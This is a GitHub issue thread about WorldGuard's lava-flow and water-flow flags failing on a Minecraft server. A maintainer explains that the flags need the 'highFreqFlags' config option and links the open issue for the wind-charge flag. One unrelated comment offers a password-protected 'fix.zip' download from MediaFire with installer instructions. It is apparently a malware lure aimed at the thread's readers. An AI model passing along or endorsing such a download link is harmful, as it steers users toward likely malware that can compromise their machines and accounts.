### ISSUE TITLE
Lava-flow and Water-Flow doesnt work

### ISSUE THREAD

**Issue by xProMDFKx** [EngineHub/WorldGuard#2132]
### WorldEdit Version

7.3.6

### WorldGuard Version

7.0.11 Beta 1

### Platform Version

Tequila Spigot 1.21.1 (is paper based)

### Confirmations

- [X] I am using the most recent Minecraft release.
- [X] I am using a version of WorldEdit compatible with my Minecraft version.
- [X] I am using a version of WorldGuard compatible with my Minecraft version.
- [X] I am using the latest or recommended version of my platform software.
- [X] I am NOT using a hybrid server, e.g. a server that combines Bukkit and Forge. Examples include Arclight, Mohist, and Cardboard.
- [X] I am NOT using a fork of WorldEdit, such as FastAsyncWorldEdit (FAWE) or AsyncWorldEdit (AWE)

### Bug Description

Basically the lava-flow and water-flow flag just doesn't work

### Expected Behavior

It should work

### Reproduction Steps

1. Make a region and use those flags

### Optional WorldGuard-Report

https://paste.enginehub.org/NZOUuDi3R.report

### Anything Else?

-

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aurorasmiles** [comment]
Those flag require the config option `highFreqFlags` is set to true, see also https://worldguard.enginehub.org/en/latest/regions/flags/#natural-events

**Comment by xProMDFKx** [comment]
> Those flag require the config option `highFreqFlags` is set to true, see also https://worldguard.enginehub.org/en/latest/regions/flags/#natural-events

Ooooohhh, thanks, but what about wind charge? the flag for it doesn't work, still getting kb

**Comment by aurorasmiles** [comment]
Yes, you've already commented on the open issue for that: https://github.com/EngineHub/WorldGuard/issues/2097
